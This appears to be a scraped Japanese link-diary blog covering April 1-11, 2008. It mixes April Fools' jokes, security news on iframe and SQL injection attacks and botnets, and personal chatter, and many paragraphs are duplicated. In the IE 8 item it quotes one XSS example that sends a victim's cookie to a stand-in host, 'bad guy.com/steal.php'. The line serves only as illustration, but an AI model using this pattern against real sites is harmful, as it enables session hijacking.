2008/04/01(火)火曜日ー。(新年度あけましておめでとうございますw)
[雑談] エイプリールフールネタ@2008年
※PCうおっち、ケッタイうおっち、INTERNETうぉっち、BBうぉっち、窓の社へのリンクありw
- “ムノーカントリー” はヤバイんじゃ?w
リアル音声合成プログラム「グレゴリオ聖子」(
)袋麺代行サービス(
)肌質検索サービス(
)
、 * 油揚げとヨーグルトであの味に
[セキュリティ] * IE 8のセキュリティ機能とそれによって生じる懸念 (ITPro)
JRの関連会社「鉄道情報システム」の中央システムセンターでどこかがショートしたらしく、ホストコンピューターの配電盤に焼け跡が見つかったそうです。 復旧お疲れ様でした〜。[セキュリティ] * インターネットを介したサービスにおける適切なHTTPSの運用 (JPCERT/CC)
SSL/TLS についての前提知識や、HTTPS の運用で注意すべき点について。 PDF。[雑談] * ASPとSaaSの違いをはっきりさせる (ITmedia)
実態は ASP でも、新し物好きの上司/営業が SaaS と言ったら SaaS になるとかありそうw[雑談] * 悪魔が出る家に悩まされ続けた家族、以前の持ち主を告訴 (GIGAZINE)
バチカンには、上級エクソシストなんていう職種があるんですか?!(^-^;
- スタパ齋藤氏、改名か 〜ときどきまちがえられるから、どうせなら (インブレスうぉっち)
※PCうおっち、ケッタイうおっち、INTERNETうぉっち、BBうぉっち、窓の社へのリンクありw
- eiga.com
- “ムノーカントリー” はヤバイんじゃ?w
- 株式会社まぐまぐ、4月1日に3サービスを同時スタート
リアル音声合成プログラム「グレゴリオ聖子」(
)袋麺代行サービス(
)肌質検索サービス(
)
- Yahoo! JAPAN - <4/1はエイプリルフールです> VOL.1 -襲来編-
- デイリーポータルZ: PASMOで高速道路
、 * 油揚げとヨーグルトであの味に
- バスの行き先が違ったら「シェー」 (/.jp)
- Google ダジャレサーチ β
- 今年もやり過ぎ!? Googleも初参戦 日本「エイプリルフール」ネタバトル (ITmedia)
- エイプリルフールに便乗しているサイトまとめ2008年版 (GIGAZINE)
- 続・エイプリルフールに便乗しているサイトまとめ2008年版 (GIGAZINE)
[セキュリティ] * IE 8のセキュリティ機能とそれによって生じる懸念 (ITPro)
textileクロスサイト・スクリプティング(XSS)攻撃に弱いWebサイトだと,攻撃者は通常,ユーザーから情報を盗む目的でコンテンツを挿入し,以下のように情報を中継する。 <img src="http://bad guy.com/steal.php?cookie=" + cookie />・・・IE 8 だと、こんな指定(↑)が出来たりするんでしょうか?w 画期的だw[雑談] * 発券トラブル JR東は94駅260端末で完全ダウン (asahi.com)
JRの関連会社「鉄道情報システム」の中央システムセンターでどこかがショートしたらしく、ホストコンピューターの配電盤に焼け跡が見つかったそうです。 復旧お疲れ様でした〜。[セキュリティ] * インターネットを介したサービスにおける適切なHTTPSの運用 (JPCERT/CC)
SSL/TLS についての前提知識や、HTTPS の運用で注意すべき点について。 PDF。[雑談] * ASPとSaaSの違いをはっきりさせる (ITmedia)
実態は ASP でも、新し物好きの上司/営業が SaaS と言ったら SaaS になるとかありそうw[雑談] * 悪魔が出る家に悩まされ続けた家族、以前の持ち主を告訴 (GIGAZINE)
バチカンには、上級エクソシストなんていう職種があるんですか?!(^-^;
2008/04/02(水)水曜日ー。(ドラえもんの主人公は・・・のび太?)
[雑談] * エア新書 : 世界で最も薄い新書。 (ZEROBASE Inc.)
エイプリールフールネタだったのかな? 面白いw 本当にあったら欲しい本もあるかも?w[雑談] * 韓国でモバイル機器の電池が爆発 - 今度はi-STATION V43 NAVI (MYCOM)
ポータブルマルチメディアプレーヤを4時間程度連続使用→発熱→爆発。[雑談] * 南房総猫めぐり(1) 100匹の猫とたわむれる"猫の楽園"--猫(にゃん)だ! パーク
ねこたまみたいな感じなのかな? もっとまったりしてるほうがいいかも〜w[雑談] ジョークRFC: * [RFC 5241] Naming Rights in IETF Protocols
エイプリールフールネタ。 プロトコルの命名権を売買できるようになるらしいですw 例えば、IPv4 のセキュリティフラグに「the Microsoft Evil bit」とかいう名前を付けたり出来るように?w[雑談] * 人間は同じ誤りを繰り返していると誤り自体を無意識下に覚えこんでしまい、さらに繰り返してしまう (なんでも評点)
ということは、いつも迷子になっていると、いつしか迷子にならずにはいられなくなってしまう?w[雑談] * 「午後イチ」って何時のこと? (ExciteBit)
午後の仕事が始まる時間ということで、ふつうに 13時ごろだと思っていましたw[雑談] * 【誤報】グーグルが「申し訳ありません」 ウイルス対策のため、検索に認証が必要に
エイプリルフールのネタだと誤魔化しておいても良かった(無理?w)のに、いさぎよいw関連: * CNET内での障害をGoogleのせいにして誤報 (/.jp)
[雑談] * 午前12時? 午後0時? (情報通信研究機構 周波数標準課)
エイプリールフールネタだったのかな? 面白いw 本当にあったら欲しい本もあるかも?w[雑談] * 韓国でモバイル機器の電池が爆発 - 今度はi-STATION V43 NAVI (MYCOM)
ポータブルマルチメディアプレーヤを4時間程度連続使用→発熱→爆発。[雑談] * 南房総猫めぐり(1) 100匹の猫とたわむれる"猫の楽園"--猫(にゃん)だ! パーク
ねこたまみたいな感じなのかな? もっとまったりしてるほうがいいかも〜w[雑談] ジョークRFC: * [RFC 5241] Naming Rights in IETF Protocols
エイプリールフールネタ。 プロトコルの命名権を売買できるようになるらしいですw 例えば、IPv4 のセキュリティフラグに「the Microsoft Evil bit」とかいう名前を付けたり出来るように?w[雑談] * 人間は同じ誤りを繰り返していると誤り自体を無意識下に覚えこんでしまい、さらに繰り返してしまう (なんでも評点)
ということは、いつも迷子になっていると、いつしか迷子にならずにはいられなくなってしまう?w[雑談] * 「午後イチ」って何時のこと? (ExciteBit)
午後の仕事が始まる時間ということで、ふつうに 13時ごろだと思っていましたw[雑談] * 【誤報】グーグルが「申し訳ありません」 ウイルス対策のため、検索に認証が必要に
エイプリルフールのネタだと誤魔化しておいても良かった(無理?w)のに、いさぎよいw関連: * CNET内での障害をGoogleのせいにして誤報 (/.jp)
[雑談] * 午前12時? 午後0時? (情報通信研究機構 周波数標準課)
textile午前12時00分00秒 = 午後00時00分00秒午後12時00分00秒 = 午前00時00分00秒葉っぱさんのブクマ経由。 正午=午後12時という勘違いはなかなか無いと思うw
2008/04/03(木)木曜日ー。(虎視眈々と、31番狙い。)
[セキュリティ] * マルウェアへ導く不正iframe攻撃が拡大中、政府系や大手メーカーも標的に
経由。 中国の政府機関サイトやソニーの中国サイトなどにもiframe埋め込みの改ざん被害。 今度のマルウェアホスト先は、IPアドレスではなく名前で書いてあり、.cnドメインらしい。関連: * You've been iframed (F-Secure Weblog)
[雑談] * なんと我が先祖が所有していた江戸〜明治期の古写真を発見! (ruri.crara.cc)
エイプリールフールネタで新サービス「幕末古写真ジェネレーター」発表。 すてき☆[出来事] * 総務省がヤフーに行政指導 「Yahoo!メール」ヘッダ情報誤表示で (ITmedia)
通信の秘密の保護に対する安全管理措置が不十分として再発防止を求めたとのこと。関連: * 他人の通信のヘッダー情報の漏えい事案に関するヤフー株式会社に対する措置 (総務省)
[雑談] * CoCo壱番屋で「カレーのトッピング全部のせ」に挑戦してみた (GIGAZINE)
よく頑張ったw 記事中で紹介されていた「* 一万円カレー (森へ帰ろう)
」も面白かったw[セキュリティ] * Officeの脆弱性を悪用した標的型攻撃も--IPA届出状況 (CNET)
[ツール] * MS製フリーソフトで既存PCを擬似シンクライアント化 (ITPro)
マイクロソフトが無償で公開するソフト「Windows SteadyState」の紹介記事。[セキュリティ] * 「この顔が表示されたら既に感染」、パソコンを乗っ取る新ウイルス (ITPro)
お金の海を泳いでいます〜〜〜w[雑談] * デイリーポータルZ: 東京の中心はどこだろう
平面で切り抜いて重心を探すのには飽き足らず、とうとう立体で切り取ることに?w
- まっちゃさん
経由。 中国の政府機関サイトやソニーの中国サイトなどにもiframe埋め込みの改ざん被害。 今度のマルウェアホスト先は、IPアドレスではなく名前で書いてあり、.cnドメインらしい。関連: * You've been iframed (F-Secure Weblog)
[雑談] * なんと我が先祖が所有していた江戸〜明治期の古写真を発見! (ruri.crara.cc)
エイプリールフールネタで新サービス「幕末古写真ジェネレーター」発表。 すてき☆[出来事] * 総務省がヤフーに行政指導 「Yahoo!メール」ヘッダ情報誤表示で (ITmedia)
通信の秘密の保護に対する安全管理措置が不十分として再発防止を求めたとのこと。関連: * 他人の通信のヘッダー情報の漏えい事案に関するヤフー株式会社に対する措置 (総務省)
[雑談] * CoCo壱番屋で「カレーのトッピング全部のせ」に挑戦してみた (GIGAZINE)
よく頑張ったw 記事中で紹介されていた「* 一万円カレー (森へ帰ろう)
」も面白かったw[セキュリティ] * Officeの脆弱性を悪用した標的型攻撃も--IPA届出状況 (CNET)
textileIPAでは、製品開発者や「JVN iPedia」から提供されるアプリケーションの脆弱性情報やバージョン更新履歴を定期的にチェックし、アプリケーションを常に最新の状態に更新して安全に利用できるようにしておくことが、今回の「北京オリンピックウイルス」などに感染しない方法として最も重要であるとしている。一般の利用者に、「JVN iPedia」の定期的な閲覧を呼びかけるのって・・・どうなんだろうw関連: * コンピュータウイルス・不正アクセスの届出状況[3月分および第1四半期] (IPA)
[ツール] * MS製フリーソフトで既存PCを擬似シンクライアント化 (ITPro)
マイクロソフトが無償で公開するソフト「Windows SteadyState」の紹介記事。[セキュリティ] * 「この顔が表示されたら既に感染」、パソコンを乗っ取る新ウイルス (ITPro)
お金の海を泳いでいます〜〜〜w[雑談] * デイリーポータルZ: 東京の中心はどこだろう
平面で切り抜いて重心を探すのには飽き足らず、とうとう立体で切り取ることに?w
2008/04/04(金)金曜日ー。(そのださんとニアミスかも?)
[セキュリティ] * いまなら聞ける!セキュリティ用語で覚える新社会人の「鉄則」 (@IT)
無理矢理 5つに絞って押し込めた感のある記事w “セキュリティ 5つの鉄則” に CSRF の話題が入るとは驚きましたw 迷惑メールとフィッシング詐欺と標的型攻撃が一緒くたに語られていたり、Windows のセキュリティアップデートが “日本では第2水曜” とか書かれていたりする。(^-^;
無理矢理 5つに絞って押し込めた感のある記事w “セキュリティ 5つの鉄則” に CSRF の話題が入るとは驚きましたw 迷惑メールとフィッシング詐欺と標的型攻撃が一緒くたに語られていたり、Windows のセキュリティアップデートが “日本では第2水曜” とか書かれていたりする。(^-^;
2008/04/05(土)土曜日ー。(やっぱり日帰りは疲れた。。)
[雑談] 昨日の富士山[雑談] 昨日のお昼ご飯本場に行ってるのにチェーン店に入っているあたりが、基本ひきこもりの私の限界ですw[動物][猫カフェ] 昨日、大名の猫カフェ「neko cafe keurig」に行って来ました♪2008年3月20日にオープンしたばかりの猫カフェです☆ 土地勘がないのに、* この記事
とか、* この記事
だけを見てお店にたどり着けたら奇跡ですw ただでさえ入り組んだ場所にあるのに、記事には番地書いてないしw オフィシャルサイトも見あたらないし? 住所は、福岡県福岡市中央区大名1-10-15 ワット1F です。 空港線の赤坂駅か天神駅から歩いていけます。 事前に地図を見ておくべし。 迷う人が続出らしくて、お店には何度も何度も場所をたずねる電話がかかってきていました。(^-^;[雑談] 昨日の帰りの飛行機まず、機材の到着が遅れてるとかで出発が30分遅れました。 その上、関東近郊に着いたと思ったら、別の飛行機と鳥とが接触した(バードストライク)とかで羽田の滑走路が一時全面閉鎖(なぜ全部閉じる必要があるんだ...)になって、伊豆大島上空を延々とぐるぐる旋回してましたw 結局、1時間遅れで着陸。 どうにか終電前に家にたどり着けて良かったけど・・・つかれた〜。(>_<)
とか、* この記事
だけを見てお店にたどり着けたら奇跡ですw ただでさえ入り組んだ場所にあるのに、記事には番地書いてないしw オフィシャルサイトも見あたらないし? 住所は、福岡県福岡市中央区大名1-10-15 ワット1F です。 空港線の赤坂駅か天神駅から歩いていけます。 事前に地図を見ておくべし。 迷う人が続出らしくて、お店には何度も何度も場所をたずねる電話がかかってきていました。(^-^;[雑談] 昨日の帰りの飛行機まず、機材の到着が遅れてるとかで出発が30分遅れました。 その上、関東近郊に着いたと思ったら、別の飛行機と鳥とが接触した(バードストライク)とかで羽田の滑走路が一時全面閉鎖(なぜ全部閉じる必要があるんだ...)になって、伊豆大島上空を延々とぐるぐる旋回してましたw 結局、1時間遅れで着陸。 どうにか終電前に家にたどり着けて良かったけど・・・つかれた〜。(>_<)
2008/04/06(日)日曜日ー。(つかれがとれない。。)
[セキュリティ] * あの「SQLインジェクション」騒動の裏で(前編) (@IT)
臨場感があって良い感じです☆ チーフエバンジェリストって・・・すごい肩書きだw[雑談] * FFR Expert Seminar (フォティーンフォティ技術研究所)
 ←“はたま”?w[セキュリティ] * IPA、Webサイト運営者向け脆弱性対応ガイドラインを公開 (ITmedia)
“ウェブサイト運営者のための脆弱性対応ガイド” が 「情報セキュリティ早期警戒パートナーシップガイドライン」に組み込まれたとの発表。 内容自体は 2月から変わってない模様? (なぜニュースに?w)関連: * 「ウェブサイト運営者のための脆弱性対応ガイド」などを公開 (IPA)
[雑談] いろいろ。
臨場感があって良い感じです☆ チーフエバンジェリストって・・・すごい肩書きだw[雑談] * FFR Expert Seminar (フォティーンフォティ技術研究所)
 ←“はたま”?w[セキュリティ] * IPA、Webサイト運営者向け脆弱性対応ガイドラインを公開 (ITmedia)
“ウェブサイト運営者のための脆弱性対応ガイド” が 「情報セキュリティ早期警戒パートナーシップガイドライン」に組み込まれたとの発表。 内容自体は 2月から変わってない模様? (なぜニュースに?w)関連: * 「ウェブサイト運営者のための脆弱性対応ガイド」などを公開 (IPA)
[雑談] いろいろ。
- document.domainの書き換えとiframeのドメイン制限 (nopnopの日記)
- 理系のための恋愛論 (278) 女子の相談の乗り方
- これからプロポーズするwwwwwwwwwww (ハムスター速報)
- ニュースサイトは古本屋さんです? (空気を読まない中杜カズサ)
- オムレツと小麦粉についての悩ましい問題 (極東ブログ)
- 日本の食卓からもやしが消える?…原料豆を中国が輸出ストップ (痛いニュース)
- 今さらながら振替輸送ってどんな仕組み? (ExciteBit)
2008/04/07(月)月曜日ー。(アンチウィルス対策ソフト?w)
[雑談] * オンラインで肌年齢の計測可能に
光学式マウスがお手元にある方は、ほっぺたに10秒、ぜひ試してみてくださいw[雑談] * 美人の判定はコンピュータで―イスラエルの研究者が開発 (ITmedia)
“美人コンテストの初期審査”に使ったら、コンピュータをだまくらかす加工法が出てきそうw[雑談] * ハッカーショーをテレビ番組が放映「盗難してくれてありがとう」
なんかタイガーチームというより、オーシャンズ11みたいなノリだなw 見てみたいw[雑談] * 服装の乱れか配慮か (future-planning.net)
そんなこと言ってしまったら、ますます Vista が売れなくなるようなw[雑談] いろいろ。
光学式マウスがお手元にある方は、ほっぺたに10秒、ぜひ試してみてくださいw[雑談] * 美人の判定はコンピュータで―イスラエルの研究者が開発 (ITmedia)
“美人コンテストの初期審査”に使ったら、コンピュータをだまくらかす加工法が出てきそうw[雑談] * ハッカーショーをテレビ番組が放映「盗難してくれてありがとう」
なんかタイガーチームというより、オーシャンズ11みたいなノリだなw 見てみたいw[雑談] * 服装の乱れか配慮か (future-planning.net)
textileダンディ坂野ではないが、右から左に受け流すことが大切なのだ。ダンディ坂野? ムーディー勝山?!w ・・・受け流せなくてゴメンナサイw[雑談] * マイクロソフトの新OS「Windows 7」は来年にも登場へ (GIGAZINE)
そんなこと言ってしまったら、ますます Vista が売れなくなるようなw[雑談] いろいろ。
- 「朝からお茶漬け」のCMに違和感、栄養的にも良くはない (痛いニュース)
- 【北京五輪】 ロンドンの聖火リレー、さながら“障害物レース” 消火器で聖火を消そうとしたり奪おうとしたり、自転車で突っ込む人も (痛いニュース)
- どんな表面からでも油性ペンを落とす方法 (Productivity pr0n)
- 引く手あまたのプログラミング言語は? (/.jp)
2008/04/08(火)火曜日ー。(デスクトップに「」をw)
[雑談] * 1万円札で200円切符、釣りが90800円! (読売新聞)
千円札を入れるところに、間違って一万円札や五千円札を入れてしまっていたそうです。 一万円札で200円切手を買った場合、お釣りが9万円分も出た可能性があるそうです。 今から名古屋行ってくる!w[雑談] * 恐喝未遂:容疑で小学校教諭逮捕 携帯拾い脅す−神戸 (毎日新聞)
[雑談] * 最大規模ボットネットKraken発見 (/.jp)
400,000台のボットから成る大規模なボットネット「Kraken」だそうです。 今まで最大とされていたStorm Wormの2倍の規模。 アンチウィルスソフト搭載のマシンにおいても8割は検出されないとのこと。[出来事] * 「carview.co.jp」サイトが改ざん 閲覧者にウイルス感染のおそれ (ITmedia)
ここも、流行中の SQLインジェクションで改ざん&マルウェア埋め込みにやられたらしい。関連: * 不正アクセスによるウェブサイト停止のお詫び及び注意喚起 (カービュー)
[雑談] いろいろ。
千円札を入れるところに、間違って一万円札や五千円札を入れてしまっていたそうです。 一万円札で200円切手を買った場合、お釣りが9万円分も出た可能性があるそうです。 今から名古屋行ってくる!w[雑談] * 恐喝未遂:容疑で小学校教諭逮捕 携帯拾い脅す−神戸 (毎日新聞)
textile男性に「おれは組員かもしれんぞ。(掲示板の)2ちゃんねるに電話番号を載せる。いくら金を用意できるか」と言って現金20万円を奪おうとした疑い。拾った携帯電話の持ち主を「2chに電話番号載せる」と脅して20万円を奪おうとして逮捕w[雑談] 北京オリンピック関連w
- 【聖火リレー】 “聖火、ついにパリに” ランナーを「装甲車48台」が囲み、ローラースケート警官100人が囲み、消防隊100人囲む (痛いニュース)
- 【仏・聖火リレー】 聖火、少なくとも“3度”消される…チベットコール&猛抗議の中、バスでたいまつ移動 (痛いニュース)
- 中国が英語版Wikipediaへのアクセス許可。ただし「チベット」は見えず (ITmedia)
- 中国が英語版Wikipediaへのアクセス規制解除 (/.jp)
[雑談] * 最大規模ボットネットKraken発見 (/.jp)
400,000台のボットから成る大規模なボットネット「Kraken」だそうです。 今まで最大とされていたStorm Wormの2倍の規模。 アンチウィルスソフト搭載のマシンにおいても8割は検出されないとのこと。[出来事] * 「carview.co.jp」サイトが改ざん 閲覧者にウイルス感染のおそれ (ITmedia)
ここも、流行中の SQLインジェクションで改ざん&マルウェア埋め込みにやられたらしい。関連: * 不正アクセスによるウェブサイト停止のお詫び及び注意喚起 (カービュー)
[雑談] いろいろ。
- 人の心の弱さを突くソーシャルエンジニアリング (@IT)
- サイバー犯罪のためのソフトウェアビジネスが成長 (ITmedia)
- 検出・修復が困難なブートキットなど確認--ネットフォレスト調査 (CNET)
- NASAのトップ気象学者が地球の危機を表明 (GIGAZINE)
- 女性自衛官だけど何か質問ある? (喪男の書き留めたい事。)
- 食品パッケージのイメージ写真と実物のひどい差を画像で示す (GIGAZINE)
- 新人向け「会社でのインターネットの使い方」 (novtan別館)
2008/04/09(水)水曜日ー。(お食事券を、食券乱用?)
[ツール] * 森本家のワークシート: タイトルをGETせよ (インフラ管理者の独り言)
お、このマクロは便利っぽい。(^-^) 「dir %windir%\*.log /o:d ...」という応用編については、いっそのこと自動でクロールしてリンクを生成してしまうという手もあるかなと思って、試作(↓)してみたw
はたして、ちゃんと動くのかどうかは・・・来月になるまで分かりません。(ぇw[セキュリティ] * Webを使った攻撃増大、Webサイトの脆弱性は対処されず (ITmedia)
てっきり SQLインジェクションの話しかと思って読み進めていたのですが、Symantec のレポートを見るとクロスサイトスクリプティングの話だったのねw 2007年下半期に発見された 1万1253件の脆弱なサイトのうち、修正が行われたのは 473件のみとの話ですが・・・これ、ちゃんとサイトに通報済みなんですかね? ただ黙って見守っていただけだとすると、気づいていないだけという可能性も。(-_-;関連: * Symantec Report Reveals Malicious Attacks Focused Toward Trusted Web Sites
[出来事] * "なりすましメール"で元同級生を「暴行する」と脅迫した高校生を逮捕 (MYCOM)
「レスポンスヘッダインジェクション」の話。 一般的には、「HTTPレスポンススプリッティング(レスポンス分割攻撃)」と呼ばれる攻撃ですが、302 Object Moved などではレスポンスボディを改ざんしても意味が無い場合が多いので、レスポンスヘッダの挿入のみで我慢するwということだと思う。(ぇw[雑談] いろいろ。
←スーパースロー。 桜の花びら感動w
←笑えるw
←格好良い!
←バイナリエディタ?w
←魂が違いすぎるw
←ネットが使えて1日1,300円!! 安っ!
←ふーん。
←ふーん。
←私は何を話せば?w
お、このマクロは便利っぽい。(^-^) 「dir %windir%\*.log /o:d ...」という応用編については、いっそのこと自動でクロールしてリンクを生成してしまうという手もあるかなと思って、試作(↓)してみたw
- マイクロソフト製品セキュリティ情報ページ (日本語版) by yamagata21
- マイクロソフト製品セキュリティ情報ページ (英語版) by yamagata21
はたして、ちゃんと動くのかどうかは・・・来月になるまで分かりません。(ぇw[セキュリティ] * Webを使った攻撃増大、Webサイトの脆弱性は対処されず (ITmedia)
てっきり SQLインジェクションの話しかと思って読み進めていたのですが、Symantec のレポートを見るとクロスサイトスクリプティングの話だったのねw 2007年下半期に発見された 1万1253件の脆弱なサイトのうち、修正が行われたのは 473件のみとの話ですが・・・これ、ちゃんとサイトに通報済みなんですかね? ただ黙って見守っていただけだとすると、気づいていないだけという可能性も。(-_-;関連: * Symantec Report Reveals Malicious Attacks Focused Toward Trusted Web Sites
[出来事] * "なりすましメール"で元同級生を「暴行する」と脅迫した高校生を逮捕 (MYCOM)
textile一般にPC上で専用ソフトを使い、送信元アドレスを偽装して送信される。From:ヘッダを詐称するのに、「専用ソフト」が必要とは知らなかったw[セキュリティ] * 第5回 レスポンスヘッダ+改行コード=脆弱性?! (@IT)
「レスポンスヘッダインジェクション」の話。 一般的には、「HTTPレスポンススプリッティング(レスポンス分割攻撃)」と呼ばれる攻撃ですが、302 Object Moved などではレスポンスボディを改ざんしても意味が無い場合が多いので、レスポンスヘッダの挿入のみで我慢するwということだと思う。(ぇw[雑談] いろいろ。
- カシオEX-F1が超高速撮影ですごい件 (ニコニコ動画)
←スーパースロー。 桜の花びら感動w
- 「前期授業を中止する」 京大でいたずら掲示 総長名で否定 (今日と新聞)
←笑えるw
- HP、500ドルのミニノートPCを発表 (ITmedia)
←格好良い!
- MS、セキュリティスイート「Stirling」のパブリックベータ版を公開 (CNET)
←バイナリエディタ?w
- 元彼から貰った詩に曲をつけてくれと頼まれました (発狂小町)
←魂が違いすぎるw
- ツカサのネットルーム
←ネットが使えて1日1,300円!! 安っ!
- 大人の女性に使う「女子」という言葉について (ExciteBit)
←ふーん。
- 紙パック飲料の底にある、謎の印刷の意味って? (ExciteBit)
←ふーん。
- デートで異性の話をしないのはマナーなんだと思った (Attribute=51)
←私は何を話せば?w
2008/04/10(木)木曜日ー。(たけうま友の会w)
[セキュリティ] * Krakenは既存のマルウェア亜種、感染台数も誇張とF-Secure (ITmedia)
[雑談] * 合コンにX-MENが来た!! (ハムスター速報)
これは笑ったw 女の子が言う「可愛い友達」は信用できないとよく聞くけれどもw[セキュリティ] * HP、マルウェア感染したUSBドライブを出荷 (CNET)
どういう経緯で混入したんですかね〜? マスタがすでに感染? 出荷前検査で感染?[雑談] 知ってたよそんなこと〜><というタイトルのメールが届いたw ずきんさんからかと思って、ドキッとしたw[セキュリティ] * ボットネットの迷惑メール送信容量は1日1000億通 (ITmedia)
現在稼働中の主要ボットネットをすべて合わせると、1日当たり1000億通の迷惑メールを送信できるそうです。 「Bobax」(例の「Kraken」)よりも参加マシンの多い、「Srizbi」というボットネットがあり、マシン数 31万5000台で1日当たり600億通の迷惑メールが送れるとのこと。(@_@)関連: * Top Spam Botnets Exposed (SecureWorks)
[雑談] いろいろ。
←もはや何のために走ってるのか分からなくなってきたw
↑被害額1千億円?!
←わんにゃんウォーカー
←1時間冷凍
←またゴーストタウン化?w
textileF-Secureは4月9日のブログで、ここ数日騒がれているボットネットの「Kraken」について、以前からあるマルウェアの亜種にすぎず、約40万台のマシンに感染しているとの情報も誇張されていると指摘した。みんな、ボット対策企業 Damballa の宣伝に踊らされていた・・・ってことかな。(^-^;関連: * Kraken, Not New But Still Newsworthy? (F-Secure Weblog)
[雑談] * 合コンにX-MENが来た!! (ハムスター速報)
これは笑ったw 女の子が言う「可愛い友達」は信用できないとよく聞くけれどもw[セキュリティ] * HP、マルウェア感染したUSBドライブを出荷 (CNET)
どういう経緯で混入したんですかね〜? マスタがすでに感染? 出荷前検査で感染?[雑談] 知ってたよそんなこと〜><というタイトルのメールが届いたw ずきんさんからかと思って、ドキッとしたw[セキュリティ] * ボットネットの迷惑メール送信容量は1日1000億通 (ITmedia)
現在稼働中の主要ボットネットをすべて合わせると、1日当たり1000億通の迷惑メールを送信できるそうです。 「Bobax」(例の「Kraken」)よりも参加マシンの多い、「Srizbi」というボットネットがあり、マシン数 31万5000台で1日当たり600億通の迷惑メールが送れるとのこと。(@_@)関連: * Top Spam Botnets Exposed (SecureWorks)
[雑談] いろいろ。
- 【米・聖火リレー】スタート直後、聖火ランナー&防衛隊が巨大倉庫に「雲隠れ」→1時間後、突如別の場所に (痛いニュース)
←もはや何のために走ってるのか分からなくなってきたw
- ファイル共有ソフトでダウンロードしたファイルの67%はウイルス入り (GIGAZINE)
- 日本海か東海か――Google Earthが海洋名の記載方針を発表 (ITmedia)
↑被害額1千億円?!
- 今、「ウォーカー系」フリーペーパーがアツイ! (ExciteBit)
←わんにゃんウォーカー
- ヨーグルトを冷凍したら、美味しいアイスになるか? (ExciteBit)
←1時間冷凍
- 多分東京を忠実に再現したmeet-meが正式オープン (/.jp)
←またゴーストタウン化?w
2008/04/11(金)金曜日ー。(女子大が目的になってるなんてw)
[雑談] プログラマ採用試験に「世界のナベアツ問題」をどうぞw渡辺鐘さんの「3の倍数と3の付く数字だけアホになり、5の倍数だけ犬っぽくなります」というネタをプログラムで表現させる採用試験はいかが?w * Fizz-Bazz問題
よりも、きっと若者が喜びます。(ぇw
[雑談] * Blogで到来!? 会社の名刺に本名ではなくハンドルネームを使う時代 (wa-ren)
JUMPERZ.NET の中の人とか、リアル名刺にハンドルも刷ってあって感動したw[雑談] * >>5がすごいギャグを言うらしいぞ (ハムスター速報)
途中ムカつくかも知れませんが、読み進めると笑えますw 予想の斜め上行く面白さw[雑談] * 大分空港の巨大回転寿司。..。.゜。*・。?♪ (ExciteBit)
大分空港の到着口の荷物受け渡しターンテーブルに回っているものとは・・・[ツール] * Excelデータをビジュアライズしよう (DesignWalker)
Excel のデータをグラフなどを使って、視覚的に分かりやすく表示できるツールや Tips。
- .xlsをインポートして、データをビジュアライズ
- ExcelやPowerPointに使える、チャートテンプレート
- Excelに小さなチャートが表示できるアドイン
- REPT関数を使ってデータを視覚的に表示するTIPS
- Excelアート系テンプレート[雑談] * サイバー犯罪・サイバーテロの攻撃手法と対策 (著:羽室英太郎)
不正アクセス手法、ウイルス・ワーム、ボットネット、DoS攻撃、P2Pとセキュリティ、Webアプリケーションに対する脅威、携帯電話、インシデント・レスポンスなど、最新のサイバー犯罪情勢とその対処方策が解説された書籍らしい。 購入を検討。 さっそく amazon の「欲しいものリスト」に入れなきゃ。(ちがうw[雑談] * ようかん、宇宙へ 「YOHKAN」発売 (ITmedia)
「洋館」と「羊羹」を取り違えさせる叙述ミステリとか思いついた・・・サイテーだなw[雑談] * 聖火リレー、緊張の長野 コース変えず警備強化 (asahi.com)
←自分もこうなりそうで怖いw
←スイーツ(優)w
←名前出してないなら良くない?
←ビックカメラ製かと思ったw
←早く撤廃してくれ...
よりも、きっと若者が喜びます。(ぇw
textileperl -e "die+map{$_.(aho)[$_%3&&!/3/].(wan)[$_%5]||$_,$/}1..40"↑TAKESAKOさんっぽく書いてみたw ↓自分らしく書いてみたw
textileperl -e "for($n=1;$n<=40;$n++){print $n.($n%3==0||$n=~/3/?'aho':'').($n%5==0?'wan':'').' ';}"「正規表現使うとか邪道。webプログラマ脳の恐怖。」というコメントは耳が痛い。(^-^;関連: * 力試しにナベアツのような判定をするプログラムを作ろうとしたところ、問題が発生しました
[雑談] * Blogで到来!? 会社の名刺に本名ではなくハンドルネームを使う時代 (wa-ren)
JUMPERZ.NET の中の人とか、リアル名刺にハンドルも刷ってあって感動したw[雑談] * >>5がすごいギャグを言うらしいぞ (ハムスター速報)
途中ムカつくかも知れませんが、読み進めると笑えますw 予想の斜め上行く面白さw[雑談] * 大分空港の巨大回転寿司。..。.゜。*・。?♪ (ExciteBit)
大分空港の到着口の荷物受け渡しターンテーブルに回っているものとは・・・[ツール] * Excelデータをビジュアライズしよう (DesignWalker)
Excel のデータをグラフなどを使って、視覚的に分かりやすく表示できるツールや Tips。
- CX NOW! Powered by Crystal Xcelsius
- .xlsをインポートして、データをビジュアライズ
- Chart Chooser
- ExcelやPowerPointに使える、チャートテンプレート
- SparkMaker 4.0 Palo Edition
- Excelに小さなチャートが表示できるアドイン
- Lightweight data exploration in Excel
- REPT関数を使ってデータを視覚的に表示するTIPS
- Art of Office - Excel
- Excelアート系テンプレート[雑談] * サイバー犯罪・サイバーテロの攻撃手法と対策 (著:羽室英太郎)
http://www.amazon.co.jp
不正アクセス手法、ウイルス・ワーム、ボットネット、DoS攻撃、P2Pとセキュリティ、Webアプリケーションに対する脅威、携帯電話、インシデント・レスポンスなど、最新のサイバー犯罪情勢とその対処方策が解説された書籍らしい。 購入を検討。 さっそく amazon の「欲しいものリスト」に入れなきゃ。(ちがうw[雑談] * ようかん、宇宙へ 「YOHKAN」発売 (ITmedia)
「洋館」と「羊羹」を取り違えさせる叙述ミステリとか思いついた・・・サイテーだなw[雑談] * 聖火リレー、緊張の長野 コース変えず警備強化 (asahi.com)
textile中国では聖火を守る英雄と見る向きもあり、「身体能力は五輪選手にも劣らない。…英、仏、日本語などで『止まれ』などの指示ができる」アピールポイントは「止まれ!」かぃw 長野もオーストラリアも「聖火警備隊」は拒否♪[雑談] いろいろ。
- 最近主流となっている、ログイン詐欺動画サイトへ誘導する悪質なブログの共通点 (ネタ帳)
- 亀山早苗コラム(67)猪突猛進すぎた男性の行く末
←自分もこうなりそうで怖いw
- ヤリマンVSスイーツ先輩 (ぁゃιぃNEWS 2nd)
←スイーツ(優)w
- “SMAP定食”に事務所&フジTVが困惑 (デイリー)
←名前出してないなら良くない?
- マルウェア付きMP3プレーヤーにご注意、感染したUSB機器発見が相次ぐ (ITmedia)
- “映像が飛び出す”3D液晶テレビ、ビックカメラが発売 (ITmedia)
←ビックカメラ製かと思ったw
- ド素人の多数決で「感情裁判」時代がやってくる? (日経BP)
